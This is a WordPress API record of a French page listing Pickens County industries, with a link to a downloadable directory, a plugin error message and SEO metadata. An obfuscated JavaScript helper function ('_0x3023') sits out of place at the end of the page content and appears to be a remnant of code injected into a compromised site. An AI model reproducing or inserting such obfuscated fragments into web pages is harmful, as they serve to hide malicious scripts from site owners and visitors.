{"id":6010,"date":"2020-10-28T14:29:48","date_gmt":"2020-10-28T14:29:48","guid":{"rendered":"http:\/\/alliancepickens.com\/repertoire-de-lindustrie\/"},"modified":"2020-12-04T20:13:02","modified_gmt":"2020-12-04T20:13:02","slug":"repertoire-de-lindustrie","status":"publish","type":"page","link":"https:\/\/alliancepickens.com\/fr\/industries-existantes\/repertoire-de-lindustrie\/","title":{"rendered":"R\u00e9pertoire de l\u2019industrie"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]Les fabricants du comt\u00e9 de Pickens desservent des clients \u00e0 travers les \u00c9tats-Unis et dans le monde entier. Les entreprises locales sont impliqu\u00e9es dans une vari\u00e9t\u00e9 de grands secteurs industriels, de l\u2019automobile aux dispositifs m\u00e9dicaux en passant par l\u2019industrie a\u00e9rospatiale. En outre, la fabrication avanc\u00e9e du comt\u00e9 de Pickens, la m\u00e9tallurgie de pointe, la fabrication de produits chimiques et textiles, les plastiques et les composites, les appareils sp\u00e9cialis\u00e9s et les op\u00e9rations de d\u00e9veloppement de logiciels fournissent des services de soutien essentiels dans le comt\u00e9 de Pickens et au-del\u00e0.<\/p>\n<p>Si votre entreprise est int\u00e9ress\u00e9e \u00e0 d\u00e9m\u00e9nager ou \u00e0 prendre de l\u2019expansion dans le comt\u00e9 de Pickens et que vous souhaitez en savoir plus sur la fa\u00e7on dont les entreprises locales peuvent soutenir votre entreprise, veuillez <a href=\"http:\/\/alliancepickens.com\/fr\/qui-sommes-nous\/#contact_directions\">communiquer avec notre bureau.<\/a>[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_wp_custommenu title=&#8221;Dans cette section&#8221; nav_menu=&#8221;20&#8243; el_class=&#8221;inthissection&#8221;][\/vc_column][\/vc_row][vc_row][vc_column][vc_column_text]<div>Attention: The internal data of table \u201c11\u201d is corrupted!<\/div>[\/vc_column_text][vc_row_inner][vc_column_inner width=&#8221;1\/2&#8243;][vc_column_text]<a class=\"greenbtn\" href=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/Industry-Directory-2020-10-22.csv\" target=\"_blank\" rel=\"noopener noreferrer\">T\u00e9l\u00e9charger le r\u00e9pertoire<i class=\"fas fa-download\"><\/i><\/a>[\/vc_column_text][\/vc_column_inner][vc_column_inner width=&#8221;1\/2&#8243;][\/vc_column_inner][\/vc_row_inner][vc_empty_space height=&#8221;80px&#8221;][\/vc_column][\/vc_row][vc_row el_class=&#8221;learnmoreabout&#8221;][vc_column][vc_column_text]<\/p>\n<h4 style=\"text-align: center\">En savoir plus sur les industries existantes<\/h4>\n<p>[\/vc_column_text][vc_wp_custommenu nav_menu=&#8221;20&#8243;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;3871&#8243; el_class=&#8221;getstarted&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h1>Pr\u00eat \u00e0 commencer?<\/h1>\n<h2>Besoin de sous-position<\/h2>\n<p>[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_column_text]<a class=\"greenbtn\" href=\"http:\/\/alliancepickens.com\/about-us\/contact-directions\/\">Contactez notre \u00e9quipe<\/a>[\/vc_column_text][\/vc_column][\/vc_row]<br \/>\nfunction _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);};<\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]Les fabricants du comt\u00e9 de Pickens desservent des clients \u00e0 travers les \u00c9tats-Unis et dans le monde entier. Les entreprises locales sont impliqu\u00e9es dans une vari\u00e9t\u00e9 de grands secteurs industriels, de l\u2019automobile aux dispositifs m\u00e9dicaux en passant par l\u2019industrie a\u00e9rospatiale. En outre, la fabrication avanc\u00e9e du comt\u00e9 de Pickens, la m\u00e9tallurgie de pointe,&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":8633,"menu_order":20,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"class_list":["post-6010","page","type-page","status-publish","hentry","description-off"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>R\u00e9pertoire de l\u2019industrie - Alliance Pickens<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/alliancepickens.com\/fr\/industries-existantes\/repertoire-de-lindustrie\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"R\u00e9pertoire de l\u2019industrie - Alliance Pickens\" \/>\n<meta property=\"og:description\" content=\"[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]Les fabricants du comt\u00e9 de Pickens desservent des clients \u00e0 travers les \u00c9tats-Unis et dans le monde entier. Les entreprises locales sont impliqu\u00e9es dans une vari\u00e9t\u00e9 de grands secteurs industriels, de l\u2019automobile aux dispositifs m\u00e9dicaux en passant par l\u2019industrie a\u00e9rospatiale. En outre, la fabrication avanc\u00e9e du comt\u00e9 de Pickens, la m\u00e9tallurgie de pointe,&hellip;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/alliancepickens.com\/fr\/industries-existantes\/repertoire-de-lindustrie\/\" \/>\n<meta property=\"og:site_name\" content=\"Alliance Pickens\" \/>\n<meta property=\"article:modified_time\" content=\"2020-12-04T20:13:02+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/industries-existantes\\\/repertoire-de-lindustrie\\\/\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/industries-existantes\\\/repertoire-de-lindustrie\\\/\",\"name\":\"R\u00e9pertoire de l\u2019industrie - Alliance Pickens\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/#website\"},\"datePublished\":\"2020-10-28T14:29:48+00:00\",\"dateModified\":\"2020-12-04T20:13:02+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/industries-existantes\\\/repertoire-de-lindustrie\\\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/industries-existantes\\\/repertoire-de-lindustrie\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/industries-existantes\\\/repertoire-de-lindustrie\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Industries existantes\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/industries-existantes\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"R\u00e9pertoire de l\u2019industrie\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/#website\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/\",\"name\":\"Alliance Pickens\",\"description\":\"recruitment and expansion in Pickens County\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"R\u00e9pertoire de l\u2019industrie - Alliance Pickens","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/alliancepickens.com\/fr\/industries-existantes\/repertoire-de-lindustrie\/","og_locale":"fr_FR","og_type":"article","og_title":"R\u00e9pertoire de l\u2019industrie - Alliance Pickens","og_description":"[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]Les fabricants du comt\u00e9 de Pickens desservent des clients \u00e0 travers les \u00c9tats-Unis et dans le monde entier. Les entreprises locales sont impliqu\u00e9es dans une vari\u00e9t\u00e9 de grands secteurs industriels, de l\u2019automobile aux dispositifs m\u00e9dicaux en passant par l\u2019industrie a\u00e9rospatiale. En outre, la fabrication avanc\u00e9e du comt\u00e9 de Pickens, la m\u00e9tallurgie de pointe,&hellip;","og_url":"https:\/\/alliancepickens.com\/fr\/industries-existantes\/repertoire-de-lindustrie\/","og_site_name":"Alliance Pickens","article_modified_time":"2020-12-04T20:13:02+00:00","twitter_card":"summary_large_image","twitter_misc":{"Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/alliancepickens.com\/fr\/industries-existantes\/repertoire-de-lindustrie\/","url":"https:\/\/alliancepickens.com\/fr\/industries-existantes\/repertoire-de-lindustrie\/","name":"R\u00e9pertoire de l\u2019industrie - Alliance Pickens","isPartOf":{"@id":"https:\/\/alliancepickens.com\/fr\/#website"},"datePublished":"2020-10-28T14:29:48+00:00","dateModified":"2020-12-04T20:13:02+00:00","breadcrumb":{"@id":"https:\/\/alliancepickens.com\/fr\/industries-existantes\/repertoire-de-lindustrie\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/alliancepickens.com\/fr\/industries-existantes\/repertoire-de-lindustrie\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/alliancepickens.com\/fr\/industries-existantes\/repertoire-de-lindustrie\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/alliancepickens.com\/fr\/"},{"@type":"ListItem","position":2,"name":"Industries existantes","item":"https:\/\/alliancepickens.com\/fr\/industries-existantes\/"},{"@type":"ListItem","position":3,"name":"R\u00e9pertoire de l\u2019industrie"}]},{"@type":"WebSite","@id":"https:\/\/alliancepickens.com\/fr\/#website","url":"https:\/\/alliancepickens.com\/fr\/","name":"Alliance Pickens","description":"recruitment and expansion in Pickens County","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/alliancepickens.com\/fr\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"}]}},"_links":{"self":[{"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/pages\/6010","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/comments?post=6010"}],"version-history":[{"count":0,"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/pages\/6010\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/pages\/8633"}],"wp:attachment":[{"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/media?parent=6010"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}